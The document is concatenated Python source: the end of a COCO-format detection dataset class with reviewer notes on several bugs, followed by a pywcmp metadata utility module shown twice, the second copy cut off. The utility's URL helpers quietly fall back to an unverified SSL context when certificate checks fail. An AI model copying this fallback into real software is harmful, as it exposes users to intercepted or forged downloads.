        # NOTE(review): str.replace swaps EVERY occurrence of 'jpg', not
        # just the extension — a name like 'jpgroup.jpg' would be mangled.
        seg_map = img_info['filename'].replace('jpg', 'png')
        #print('---'*100)
        #print(img_info)
        ann = dict(
            bboxes=gt_bboxes,
            labels=gt_labels,
            bboxes_ignore=gt_bboxes_ignore,
            masks=gt_masks_ann,
            seg_map=seg_map)
        return ann

    def xyxy2xywh(self, bbox):
        """Convert ``xyxy`` style bounding boxes to ``xywh`` style for COCO
        evaluation.

        Args:
            bbox (numpy.ndarray): The bounding boxes, shape (4, ), in
                ``xyxy`` order.

        Returns:
            list[float]: The converted bounding boxes, in ``xywh`` order.
        """
        _bbox = bbox.tolist()
        return [
            _bbox[0],
            _bbox[1],
            _bbox[2] - _bbox[0],
            _bbox[3] - _bbox[1],
        ]

    def _proposal2json(self, results):
        """Convert proposal results to COCO json style."""
        json_results = []
        for idx in range(len(self)):
            img_id = self.img_ids[idx]
            bboxes = results[idx]
            for i in range(bboxes.shape[0]):
                data = dict()
                data['image_id'] = img_id
                data['bbox'] = self.xyxy2xywh(bboxes[i])
                data['score'] = float(bboxes[i][4])
                # proposals are class-agnostic; COCO still requires an id
                data['category_id'] = 1
                json_results.append(data)
        return json_results

    def _det2json(self, results):
        """Convert detection results to COCO json style."""
        json_results = []
        for idx in range(len(self)):
            img_id = self.img_ids[idx]
            result = results[idx]
            for label in range(len(result)):
                bboxes = result[label]
                for i in range(bboxes.shape[0]):
                    data = dict()
                    data['image_id'] = img_id
                    data['bbox'] = self.xyxy2xywh(bboxes[i])
                    data['score'] = float(bboxes[i][4])
                    data['category_id'] = self.cat_ids[label]
                    json_results.append(data)
        return json_results

    def _segm2json(self, results):
        """Convert instance segmentation results to COCO json style."""
        bbox_json_results = []
        segm_json_results = []
        for idx in range(len(self)):
            img_id = self.img_ids[idx]
            det, seg = results[idx]
            for label in range(len(det)):
                # bbox results
                bboxes = det[label]
                for i in range(bboxes.shape[0]):
                    data = dict()
                    data['image_id'] = img_id
                    data['bbox'] = self.xyxy2xywh(bboxes[i])
                    data['score'] = float(bboxes[i][4])
                    data['category_id'] = self.cat_ids[label]
                    bbox_json_results.append(data)
                # segm results
                # some detectors use different scores for bbox and mask
                if isinstance(seg, tuple):
                    segms = seg[0][label]
                    mask_score = seg[1][label]
                else:
                    segms = seg[label]
                    mask_score = [bbox[4] for bbox in bboxes]
                for i in range(bboxes.shape[0]):
                    data = dict()
                    data['image_id'] = img_id
                    data['bbox'] = self.xyxy2xywh(bboxes[i])
                    data['score'] = float(mask_score[i])
                    data['category_id'] = self.cat_ids[label]
                    # RLE counts may come back as bytes; json needs str
                    if isinstance(segms[i]['counts'], bytes):
                        segms[i]['counts'] = segms[i]['counts'].decode()
                    data['segmentation'] = segms[i]
                    segm_json_results.append(data)
        return bbox_json_results, segm_json_results

    def results2json(self, results, outfile_prefix):
        """Dump the detection results to a COCO style json file.

        There are 3 types of results: proposals, bbox predictions, mask
        predictions, and they have different data types. This method will
        automatically recognize the type, and dump them to json files.

        Args:
            results (list[list | tuple | ndarray]): Testing results of the
                dataset.
            outfile_prefix (str): The filename prefix of the json files. If the
                prefix is "somepath/xxx", the json files will be named
                "somepath/xxx.bbox.json", "somepath/xxx.segm.json",
                "somepath/xxx.proposal.json".

        Returns:
            dict[str: str]: Possible keys are "bbox", "segm", "proposal", and \
                values are corresponding filenames.
        """
        result_files = dict()
        # list -> per-class bbox results; tuple -> (bbox, segm); ndarray ->
        # class-agnostic proposals
        if isinstance(results[0], list):
            json_results = self._det2json(results)
            result_files['bbox'] = f'{outfile_prefix}.bbox.json'
            result_files['proposal'] = f'{outfile_prefix}.bbox.json'
            mmcv.dump(json_results, result_files['bbox'])
        elif isinstance(results[0], tuple):
            json_results = self._segm2json(results)
            result_files['bbox'] = f'{outfile_prefix}.bbox.json'
            result_files['proposal'] = f'{outfile_prefix}.bbox.json'
            result_files['segm'] = f'{outfile_prefix}.segm.json'
            mmcv.dump(json_results[0], result_files['bbox'])
            mmcv.dump(json_results[1], result_files['segm'])
        elif isinstance(results[0], np.ndarray):
            json_results = self._proposal2json(results)
            result_files['proposal'] = f'{outfile_prefix}.proposal.json'
            mmcv.dump(json_results, result_files['proposal'])
        else:
            raise TypeError('invalid type of results')
        return result_files

    def fast_eval_recall(self, results, proposal_nums, iou_thrs, logger=None):
        """Compute average recall of proposals directly (no json round-trip).

        Args:
            results (list[ndarray]): Per-image proposal arrays.
            proposal_nums (Sequence[int]): Proposal numbers to evaluate at.
            iou_thrs (Sequence[float]): IoU thresholds.
            logger (logging.Logger | str | None): Logger for printing.

        Returns:
            numpy.ndarray: AR averaged over IoU thresholds, one value per
                entry of ``proposal_nums``.
        """
        gt_bboxes = []
        for i in range(len(self.img_ids)):
            ann_ids = self.coco.get_ann_ids(img_ids=self.img_ids[i])
            ann_info = self.coco.load_anns(ann_ids)
            if len(ann_info) == 0:
                gt_bboxes.append(np.zeros((0, 4)))
                continue
            bboxes = []
            for ann in ann_info:
                # skip ignored and crowd annotations for recall
                if ann.get('ignore', False) or ann['iscrowd']:
                    continue
                x1, y1, w, h = ann['bbox']
                bboxes.append([x1, y1, x1 + w, y1 + h])
            bboxes = np.array(bboxes, dtype=np.float32)
            if bboxes.shape[0] == 0:
                bboxes = np.zeros((0, 4))
            gt_bboxes.append(bboxes)
        recalls = eval_recalls(
            gt_bboxes, results, proposal_nums, iou_thrs, logger=logger)
        # average over the IoU-threshold axis
        ar = recalls.mean(axis=1)
        return ar

    def format_results(self, results, jsonfile_prefix=None, **kwargs):
        """Format the results to json (standard format for COCO evaluation).

        Args:
            results (list[tuple | numpy.ndarray]): Testing results of the
                dataset.
            jsonfile_prefix (str | None): The prefix of json files. It includes
                the file path and the prefix of filename, e.g., "a/b/prefix".
                If not specified, a temp file will be created. Default: None.

        Returns:
            tuple: (result_files, tmp_dir), result_files is a dict containing \
                the json filepaths, tmp_dir is the temporal directory created \
                for saving json files when jsonfile_prefix is not specified.
        """
        assert isinstance(results, list), 'results must be a list'
        assert len(results) == len(self), (
            'The length of results is not equal to the dataset len: {} != {}'.
            format(len(results), len(self)))
        if jsonfile_prefix is None:
            # caller is responsible for cleanup via the returned tmp_dir
            tmp_dir = tempfile.TemporaryDirectory()
            jsonfile_prefix = osp.join(tmp_dir.name, 'results')
        else:
            tmp_dir = None
        result_files = self.results2json(results, jsonfile_prefix)
        return result_files, tmp_dir

    def evaluate(self,
                 results,
                 metric='bbox',
                 logger=None,
                 jsonfile_prefix=None,
                 classwise=False,
                 proposal_nums=(100, 300, 1000),
                 iou_thrs=None,
                 metric_items=None):
        """Evaluation in COCO protocol.

        Args:
            results (list[list | tuple]): Testing results of the dataset.
            metric (str | list[str]): Metrics to be evaluated. Options are
                'bbox', 'segm', 'proposal', 'proposal_fast'.
            logger (logging.Logger | str | None): Logger used for printing
                related information during evaluation. Default: None.
            jsonfile_prefix (str | None): The prefix of json files. It includes
                the file path and the prefix of filename, e.g., "a/b/prefix".
                If not specified, a temp file will be created. Default: None.
            classwise (bool): Whether to evaluating the AP for each class.
            proposal_nums (Sequence[int]): Proposal number used for evaluating
                recalls, such as recall@100, recall@1000.
                Default: (100, 300, 1000).
            iou_thrs (Sequence[float], optional): IoU threshold used for
                evaluating recalls/mAPs. If set to a list, the average of all
                IoUs will also be computed. If not specified, [0.50, 0.55,
                0.60, 0.65, 0.70, 0.75, 0.80, 0.85, 0.90, 0.95] will be used.
                Default: None.
            metric_items (list[str] | str, optional): Metric items that will
                be returned. If not specified, ``['AR@100', 'AR@300',
                'AR@1000', 'AR_s@1000', 'AR_m@1000', 'AR_l@1000' ]`` will be
                used when ``metric=='proposal'``, ``['mAP', 'mAP_50', 'mAP_75',
                'mAP_s', 'mAP_m', 'mAP_l']`` will be used when
                ``metric=='bbox' or metric=='segm'``.

        Returns:
            dict[str, float]: COCO style evaluation metric.
        """
        metrics = metric if isinstance(metric, list) else [metric]
        allowed_metrics = ['bbox', 'segm', 'proposal', 'proposal_fast']
        for metric in metrics:
            if metric not in allowed_metrics:
                raise KeyError(f'metric {metric} is not supported')
        if iou_thrs is None:
            # NOTE(review): nonstandard — thresholds start at 0.10 (18 values)
            # instead of COCO's usual 0.50:0.95; the docstring above still
            # describes the standard range.
            iou_thrs = np.linspace(
                .10, 0.95, int(np.round((0.95 - .10) / .05)) + 1, endpoint=True)
        # NOTE(review): debug print left in — consider removing or logging.
        print(iou_thrs)
        if metric_items is not None:
            if not isinstance(metric_items, list):
                metric_items = [metric_items]
        result_files, tmp_dir = self.format_results(results, jsonfile_prefix)
        eval_results = {}
        cocoGt = self.coco
        for metric in metrics:
            msg = f'Evaluating {metric}...'
            if logger is None:
                msg = '\n' + msg
            print_log(msg, logger=logger)
            if metric == 'proposal_fast':
                ar = self.fast_eval_recall(
                    results, proposal_nums, iou_thrs, logger='silent')
                log_msg = []
                for i, num in enumerate(proposal_nums):
                    eval_results[f'AR@{num}'] = ar[i]
                    log_msg.append(f'\nAR@{num}\t{ar[i]:.4f}')
                log_msg = ''.join(log_msg)
                print_log(log_msg, logger=logger)
                continue
            if metric not in result_files:
                raise KeyError(f'{metric} is not in results')
            try:
                cocoDt = cocoGt.loadRes(result_files[metric])
            except IndexError:
                print_log(
                    'The testing results of the whole dataset is empty.',
                    logger=logger,
                    level=logging.ERROR)
                break
            iou_type = 'bbox' if metric == 'proposal' else metric
            cocoEval = COCOeval(cocoGt, cocoDt, iou_type)
            cocoEval.params.catIds = self.cat_ids
            cocoEval.params.imgIds = self.img_ids
            cocoEval.params.maxDets = list(proposal_nums)
            cocoEval.params.iouThrs = iou_thrs
            # mapping of cocoEval.stats
            # NOTE(review): indices 3/4 ('mAP_25', 'map_10') assume the forked
            # COCOeval_opt emits two extra low-IoU entries, shifting the
            # standard layout by 2 — confirm against that fork. 'map_10' is
            # lowercase, inconsistent with the other keys (it is spelled the
            # same way in the defaults below, so lookups still match).
            coco_metric_names = {
                'mAP': 0,
                'mAP_50': 1,
                'mAP_75': 2,
                'mAP_25': 3,
                'map_10':4,
                'mAP_s': 5,
                'mAP_m': 6,
                'mAP_l': 7,
                'AR@100': 8,
                'AR@300': 9,
                'AR@1000': 10,
                'AR_s@1000': 11,
                'AR_m@1000': 12,
                'AR_l@1000': 13
            }
            if metric_items is not None:
                for metric_item in metric_items:
                    if metric_item not in coco_metric_names:
                        raise KeyError(
                            f'metric item {metric_item} is not supported')
            if metric == 'proposal':
                # class-agnostic proposal evaluation
                cocoEval.params.useCats = 0
                cocoEval.evaluate()
                cocoEval.accumulate()
                cocoEval.summarize()
                if metric_items is None:
                    metric_items = [
                        'AR@100', 'AR@300', 'AR@1000', 'AR_s@1000',
                        'AR_m@1000', 'AR_l@1000'
                    ]
                for item in metric_items:
                    val = float(
                        f'{cocoEval.stats[coco_metric_names[item]]:.3f}')
                    eval_results[item] = val
            else:
                cocoEval.evaluate()
                cocoEval.accumulate()
                cocoEval.summarize()
                if classwise:  # Compute per-category AP
                    # Compute per-category AP
                    # from https://github.com/facebookresearch/detectron2/
                    precisions = cocoEval.eval['precision']
                    # precision: (iou, recall, cls, area range, max dets)
                    assert len(self.cat_ids) == precisions.shape[2]
                    results_per_category = []
                    for idx, catId in enumerate(self.cat_ids):
                        # area range index 0: all area ranges
                        # max dets index -1: typically 100 per image
                        nm = self.coco.loadCats(catId)[0]
                        precision = precisions[:, :, idx, 0, -1]
                        precision = precision[precision > -1]
                        if precision.size:
                            ap = np.mean(precision)
                        else:
                            ap = float('nan')
                        results_per_category.append(
                            (f'{nm["name"]}', f'{float(ap):0.3f}'))
                    num_columns = min(6, len(results_per_category) * 2)
                    results_flatten = list(
                        itertools.chain(*results_per_category))
                    headers = ['category', 'AP'] * (num_columns // 2)
                    results_2d = itertools.zip_longest(*[
                        results_flatten[i::num_columns]
                        for i in range(num_columns)
                    ])
                    table_data = [headers]
                    table_data += [result for result in results_2d]
                    table = AsciiTable(table_data)
                    print_log('\n' + table.table, logger=logger)
                if metric_items is None:
                    metric_items = [
                        'mAP', 'mAP_50', 'mAP_75', 'mAP_25','map_10','mAP_s', 'mAP_m', 'mAP_l'
                    ]
                for metric_item in metric_items:
                    key = f'{metric}_{metric_item}'
                    val = float(
                        f'{cocoEval.stats[coco_metric_names[metric_item]]:.3f}'
                    )
                    eval_results[key] = val
                # first six stats, space-separated for easy copy/paste
                ap = cocoEval.stats[:6]
                eval_results[f'{metric}_mAP_copypaste'] = (
                    f'{ap[0]:.3f} {ap[1]:.3f} {ap[2]:.3f} {ap[3]:.3f} '
                    f'{ap[4]:.3f} {ap[5]:.3f}')
        if tmp_dir is not None:
            tmp_dir.cleanup()
        return eval_results
|
# =================================================================
#
# Terms and Conditions of Use
#
# Unless otherwise noted, computer program source code of this
# distribution is covered under Crown Copyright, Government of
# Canada, and is distributed under the MIT License.
#
# The Canada wordmark and related graphics associated with this
# distribution are protected under trademark law and copyright law.
# No permission is granted to use them outside the parameters of
# the Government of Canada's corporate identity program. For
# more information, see
# http://www.tbs-sct.gc.ca/fip-pcim/index-eng.asp
#
# Copyright title to all 3rd party software distributed with this
# software is held by the respective copyright holders as noted in
# those files. Users are asked to read the 3rd Party Licenses
# referenced with those assets.
#
# Copyright (c) 2020-2021 Government of Canada
# Copyright (c) 2020-2021 IBL Software Engineering spol. s r. o.
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import logging
import os
import ssl
import sys
from datetime import datetime, timezone, timedelta
from dateutil.parser import parse
from urllib.error import URLError
from urllib.request import urlopen
from urllib.parse import urlparse
from lxml import etree
# Module-level logger for this module.
LOGGER = logging.getLogger(__name__)
# XML namespace prefix -> URI map, consumed by nspath_eval() and by the
# namespaced xpath queries below.
NAMESPACES = {
    'gco': 'http://www.isotc211.org/2005/gco',
    'gmd': 'http://www.isotc211.org/2005/gmd',
    'gml': 'http://www.opengis.net/gml/3.2',
    'gmx': 'http://www.isotc211.org/2005/gmx',
    'xlink': 'http://www.w3.org/1999/xlink'
}
def get_cli_common_options(function):
    """
    Decorate *function* with the CLI options shared by all commands
    (``--verbosity`` and ``--log``).

    :param function: click command function to decorate
    :returns: the decorated function
    """
    import click

    verbosity_opt = click.option('--verbosity', '-v',
                                 type=click.Choice(
                                     ['ERROR', 'WARNING', 'INFO', 'DEBUG']),
                                 help='Verbosity')
    logfile_opt = click.option('--log', '-l', 'logfile',
                               type=click.Path(writable=True, dir_okay=False),
                               help='Log file')
    # apply in the same order as chained assignment would: verbosity first
    return logfile_opt(verbosity_opt(function))
def get_codelists():
    """
    Assemble the ISO and WMO codelists into a single dict.

    :returns: `dict` keyed by authority ('iso', 'wmo'), each value mapping
              a codelist identifier to the list of its code entry names
    """
    userdir = get_userdir()
    # authority -> codelist XML file shipped in the user directory
    sources = {
        'iso': f'{userdir}/schema/resources/Codelist/gmxCodelists.xml',
        'wmo': f'{userdir}{os.sep}WMOCodeLists.xml'
    }
    codelists = {}
    for authority, filepath in sources.items():
        per_authority = {}
        xml = etree.parse(filepath)
        dictionaries = xml.xpath('gmx:codelistItem/gmx:CodeListDictionary',
                                 namespaces=NAMESPACES)
        for dictionary in dictionaries:
            identifier = dictionary.get(nspath_eval('gml:id'))
            entries = dictionary.findall(nspath_eval(
                'gmx:codeEntry/gmx:CodeDefinition/gml:identifier'))
            per_authority[identifier] = [entry.text for entry in entries]
        codelists[authority] = per_authority
    return codelists
def get_string_or_anchor_value(parent) -> list:
    """
    Collect the texts of CharacterString and Anchor children of *parent*.

    :param parent: the element whose children are read
    :returns: list of text values (CharacterString children first)
    """
    strings = parent.findall(nspath_eval('gco:CharacterString'))
    anchors = parent.findall(nspath_eval('gmx:Anchor'))
    return [child.text for child in strings + anchors]
def get_string_or_anchor_values(parent_elements: list) -> list:
    """
    Collect CharacterString / Anchor texts from every element of
    *parent_elements* into one flat list.

    :param parent_elements: parents whose child values are read
    :returns: flat list of all text values found
    """
    collected = []
    for parent in parent_elements:
        collected.extend(get_string_or_anchor_value(parent))
    return collected
def get_keyword_info(main_keyword_element) -> tuple:
    """
    Extract keywords, type value(s) and thesaurus(es) from an
    "MD_Keywords" element.

    :param main_keyword_element: the element to inspect
    :returns: tuple of (keyword elements, type code values,
              thesaurus title elements)
    """
    keywords = main_keyword_element.findall(nspath_eval('gmd:keyword'))
    type_codes = main_keyword_element.findall(
        nspath_eval('gmd:type/gmd:MD_KeywordTypeCode'))
    thesauruses = main_keyword_element.findall(
        nspath_eval('gmd:thesaurusName/gmd:CI_Citation/gmd:title'))
    return keywords, get_codelist_values(type_codes), thesauruses
def get_codelist_values(elements: list) -> list:
    """
    Read the code list value of each element, preferring the
    ``codeListValue`` attribute over the text node. Elements carrying
    neither are skipped.

    :param elements: the elements to read
    :returns: list of code list values as strings
    """
    collected = []
    for element in elements:
        candidate = element.get('codeListValue')
        candidate = element.text if candidate is None else candidate
        if candidate is not None:
            collected.append(candidate)
    return collected
def parse_time_position(element) -> datetime:
    """
    Extract a datetime from the given GML element, or None if parsing failed.

    Parsing is deliberately lenient so that "Zulu" and naive time strings
    (and other oddities) can be mixed, on the assumption that all
    meteorological data refer to UTC.

    :param element: XML / GML element (e.g. gml:beginPosition)
    """
    indeterminate = element.get('indeterminatePosition')
    if indeterminate is not None:
        now = datetime.now(timezone.utc)
        if indeterminate in ("now", "unknown"):
            return now
        if indeterminate == "before":
            return now - timedelta(hours=24)
        if indeterminate == "after":
            return now + timedelta(hours=24)
        LOGGER.debug(f'Time point has unexpected value of indeterminatePosition: {indeterminate}')
    elif element.text is not None:
        raw = element.text
        # strip a trailing Zulu designator; the result is re-tagged as UTC
        if raw.endswith('Z'):
            raw = raw[:-1]
        try:
            return parse(raw, fuzzy=True, ignoretz=True).replace(tzinfo=timezone.utc)
        except Exception as err:
            LOGGER.debug(f'Invalid time string: {err}')
    return None
def get_userdir() -> str:
    """
    Helper function to get userdir

    :returns: path of the per-user pywcmp directory (``~/.pywcmp``)
    """
    # Use double quotes inside the f-string: nesting the same quote
    # character is only valid on Python 3.12+ (PEP 701) and is a
    # SyntaxError on older interpreters; this also matches the other
    # copy of this helper in the codebase.
    return f'{os.path.expanduser("~")}{os.sep}.pywcmp'
def nspath_eval(xpath: str) -> str:
    """
    Expand namespace prefixes in *xpath* into etree-friendly
    ``{uri}localname`` steps.

    :param xpath: xpath string with namespace prefixes
    :returns: etree friendly xpath
    """
    def expand(step: str) -> str:
        # steps without a prefix pass through unchanged
        if ':' not in step:
            return step
        prefix, localname = step.split(':')
        return f'{{{NAMESPACES[prefix]}}}{localname}'

    return '/'.join(expand(step) for step in xpath.split('/'))
def setup_logger(loglevel: str = None, logfile: str = None):
    """
    Configure the logging subsystem.

    :param loglevel: logging level name (e.g. 'INFO')
    :param logfile: logfile location; if given without a level, 'INFO' is used
    :returns: void (creates logging instance)
    """
    if loglevel is None and logfile is None:  # logging disabled entirely
        return
    if loglevel is None:
        loglevel = 'INFO'

    named_levels = {
        'CRITICAL': logging.CRITICAL,
        'ERROR': logging.ERROR,
        'WARNING': logging.WARNING,
        'INFO': logging.INFO,
        'DEBUG': logging.DEBUG,
        'NOTSET': logging.NOTSET,
    }
    level = named_levels[loglevel]
    log_format = '[%(asctime)s] %(levelname)s - %(message)s'
    date_format = '%Y-%m-%dT%H:%M:%SZ'

    if logfile is not None:  # file sink takes precedence
        logging.basicConfig(level=level, datefmt=date_format,
                            format=log_format, filename=logfile)
    else:  # otherwise log to stdout
        logging.basicConfig(level=level, datefmt=date_format,
                            format=log_format, stream=sys.stdout)
    LOGGER.debug('Logging initialized')
def urlopen_(url: str):
    """
    Download a URL, retrying once without certificate verification when
    the verified attempt fails.

    :param url: URL to download
    :returns: `http.client.HTTPResponse`
    """
    try:
        return urlopen(url)
    except (ssl.SSLError, URLError) as err:
        LOGGER.warning(err)
        LOGGER.warning('Creating unverified context')
        unverified = ssl._create_unverified_context()
        return urlopen(url, context=unverified)
def check_url(url: str, check_ssl: bool, timeout: int = 30) -> dict:
    """
    Helper function to check link (URL) accessibility

    :param url: The URL to check
    :param check_ssl: Whether the SSL/TLS layer verification shall be made
    :param timeout: timeout, in seconds (default: 30)

    :returns: `dict` with details about the link
    """
    response = None
    result = {
        'mime-type': None,
        'url-original': url
    }
    try:
        if check_ssl is False:
            LOGGER.debug('Creating unverified context')
            result['ssl'] = False
            context = ssl._create_unverified_context()
            response = urlopen(url, context=context, timeout=timeout)
        else:
            response = urlopen(url, timeout=timeout)
    except TimeoutError as err:
        LOGGER.debug(f'Timeout error: {err}')
    except (ssl.SSLError, URLError, ValueError) as err:
        LOGGER.debug(f'SSL/URL error: {err}')
        LOGGER.debug(err)
    except Exception as err:
        LOGGER.debug(f'Other error: {err}')
        LOGGER.debug(err)
    if response is None and check_ssl is True:
        # Retry once without certificate verification, propagating the
        # caller's timeout (previously the retry silently reverted to the
        # 30-second default).
        return check_url(url, False, timeout)
    if response is not None:
        result['url-resolved'] = response.url
        parsed_uri = urlparse(response.url)
        if parsed_uri.scheme in ('http', 'https'):
            if response.status > 300:
                LOGGER.debug(f'Request failed: {response}')
            result['accessible'] = response.status < 300
            result['mime-type'] = response.headers.get_content_type()
        else:
            # non-HTTP scheme resolved without error: treat as accessible
            result['accessible'] = True
        # Previously written as `scheme in ('https')`, a substring test on
        # the string 'https' that also matched scheme 'http'; only a real
        # https link should be marked ssl-verified.
        if parsed_uri.scheme == 'https' and check_ssl is True:
            result['ssl'] = True
    else:
        result['accessible'] = False
    return result
def validate_iso_xml(xml):
    """
    Perform XML Schema validation of ISO XML Metadata.

    :param xml: file or string of XML
    :returns: `bool` of whether XML validates ISO schema
    """
    userdir = get_userdir()
    if not os.path.exists(userdir):
        raise IOError(f'{userdir} does not exist')
    # accept raw strings as well as file-like/parsed input
    if isinstance(xml, str):
        xml = etree.fromstring(xml)
    xsd = os.path.join(userdir, 'iso-all.xsd')
    LOGGER.debug(f'Validating {xml} against schema {xsd}')
    etree.XMLSchema(etree.parse(xsd)).assertValid(xml)
def parse_wcmp(content):
    """
    Parse a buffer into an etree ElementTree.

    :param content: str of xml content
    :returns: `lxml.etree._ElementTree` object of WCMP
    """
    try:
        exml = etree.parse(content)
    except etree.XMLSyntaxError as err:
        LOGGER.error(err)
        raise RuntimeError('Syntax error')
    expected_root = '{http://www.isotc211.org/2005/gmd}MD_Metadata'
    if exml.getroot().tag != expected_root:
        raise RuntimeError('Does not look like a WCMP document!')
    return exml
| # =================================================================
#
# Terms and Conditions of Use
#
# Unless otherwise noted, computer program source code of this
# distribution is covered under Crown Copyright, Government of
# Canada, and is distributed under the MIT License.
#
# The Canada wordmark and related graphics associated with this
# distribution are protected under trademark law and copyright law.
# No permission is granted to use them outside the parameters of
# the Government of Canada's corporate identity program. For
# more information, see
# http://www.tbs-sct.gc.ca/fip-pcim/index-eng.asp
#
# Copyright title to all 3rd party software distributed with this
# software is held by the respective copyright holders as noted in
# those files. Users are asked to read the 3rd Party Licenses
# referenced with those assets.
#
# Copyright (c) 2020-2021 Government of Canada
# Copyright (c) 2020-2021 IBL Software Engineering spol. s r. o.
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import logging
import os
import ssl
import sys
from datetime import datetime, timezone, timedelta
from dateutil.parser import parse
from urllib.error import URLError
from urllib.request import urlopen
from urllib.parse import urlparse
from lxml import etree
# Module-level logger for this module.
LOGGER = logging.getLogger(__name__)
# XML namespace prefix -> URI map, consumed by nspath_eval() and by the
# namespaced xpath queries below.
NAMESPACES = {
    'gco': 'http://www.isotc211.org/2005/gco',
    'gmd': 'http://www.isotc211.org/2005/gmd',
    'gml': 'http://www.opengis.net/gml/3.2',
    'gmx': 'http://www.isotc211.org/2005/gmx',
    'xlink': 'http://www.w3.org/1999/xlink'
}
def get_cli_common_options(function):
    """
    Decorate *function* with the CLI options shared by all commands
    (``--verbosity`` and ``--log``).

    :param function: click command function to decorate
    :returns: the decorated function
    """
    import click

    verbosity_opt = click.option('--verbosity', '-v',
                                 type=click.Choice(
                                     ['ERROR', 'WARNING', 'INFO', 'DEBUG']),
                                 help='Verbosity')
    logfile_opt = click.option('--log', '-l', 'logfile',
                               type=click.Path(writable=True, dir_okay=False),
                               help='Log file')
    # apply in the same order as chained assignment would: verbosity first
    return logfile_opt(verbosity_opt(function))
def get_codelists():
    """
    Assemble the ISO and WMO codelists into a single dict.

    :returns: `dict` keyed by authority ('iso', 'wmo'), each value mapping
              a codelist identifier to the list of its code entry names
    """
    userdir = get_userdir()
    # authority -> codelist XML file shipped in the user directory
    sources = {
        'iso': f'{userdir}/schema/resources/Codelist/gmxCodelists.xml',
        'wmo': f'{userdir}{os.sep}WMOCodeLists.xml'
    }
    codelists = {}
    for authority, filepath in sources.items():
        per_authority = {}
        xml = etree.parse(filepath)
        dictionaries = xml.xpath('gmx:codelistItem/gmx:CodeListDictionary',
                                 namespaces=NAMESPACES)
        for dictionary in dictionaries:
            identifier = dictionary.get(nspath_eval('gml:id'))
            entries = dictionary.findall(nspath_eval(
                'gmx:codeEntry/gmx:CodeDefinition/gml:identifier'))
            per_authority[identifier] = [entry.text for entry in entries]
        codelists[authority] = per_authority
    return codelists
def get_string_or_anchor_value(parent) -> list:
    """
    Collect the texts of CharacterString and Anchor children of *parent*.

    :param parent: the element whose children are read
    :returns: list of text values (CharacterString children first)
    """
    strings = parent.findall(nspath_eval('gco:CharacterString'))
    anchors = parent.findall(nspath_eval('gmx:Anchor'))
    return [child.text for child in strings + anchors]
def get_string_or_anchor_values(parent_elements: list) -> list:
    """
    Collect CharacterString / Anchor texts from every element of
    *parent_elements* into one flat list.

    :param parent_elements: parents whose child values are read
    :returns: flat list of all text values found
    """
    collected = []
    for parent in parent_elements:
        collected.extend(get_string_or_anchor_value(parent))
    return collected
def get_keyword_info(main_keyword_element) -> tuple:
    """
    Extract keywords, type value(s) and thesaurus(es) from an
    "MD_Keywords" element.

    :param main_keyword_element: the element to inspect
    :returns: tuple of (keyword elements, type code values,
              thesaurus title elements)
    """
    keywords = main_keyword_element.findall(nspath_eval('gmd:keyword'))
    type_codes = main_keyword_element.findall(
        nspath_eval('gmd:type/gmd:MD_KeywordTypeCode'))
    thesauruses = main_keyword_element.findall(
        nspath_eval('gmd:thesaurusName/gmd:CI_Citation/gmd:title'))
    return keywords, get_codelist_values(type_codes), thesauruses
def get_codelist_values(elements: list) -> list:
    """
    Read the code list value of each element, preferring the
    ``codeListValue`` attribute over the text node. Elements carrying
    neither are skipped.

    :param elements: the elements to read
    :returns: list of code list values as strings
    """
    collected = []
    for element in elements:
        candidate = element.get('codeListValue')
        candidate = element.text if candidate is None else candidate
        if candidate is not None:
            collected.append(candidate)
    return collected
def parse_time_position(element) -> datetime:
    """
    Extract a datetime from the given GML element, or None if parsing failed.

    Parsing is deliberately lenient so that "Zulu" and naive time strings
    (and other oddities) can be mixed, on the assumption that all
    meteorological data refer to UTC.

    :param element: XML / GML element (e.g. gml:beginPosition)
    """
    indeterminate = element.get('indeterminatePosition')
    if indeterminate is not None:
        now = datetime.now(timezone.utc)
        if indeterminate in ("now", "unknown"):
            return now
        if indeterminate == "before":
            return now - timedelta(hours=24)
        if indeterminate == "after":
            return now + timedelta(hours=24)
        LOGGER.debug(f'Time point has unexpected value of indeterminatePosition: {indeterminate}')
    elif element.text is not None:
        raw = element.text
        # strip a trailing Zulu designator; the result is re-tagged as UTC
        if raw.endswith('Z'):
            raw = raw[:-1]
        try:
            return parse(raw, fuzzy=True, ignoretz=True).replace(tzinfo=timezone.utc)
        except Exception as err:
            LOGGER.debug(f'Invalid time string: {err}')
    return None
def get_userdir() -> str:
    """
    Helper function to get the pywcmp user directory
    :returns: path of the `.pywcmp` directory under the user's home
    """
    home = os.path.expanduser('~')
    return os.sep.join([home, '.pywcmp'])
def nspath_eval(xpath: str) -> str:
    """
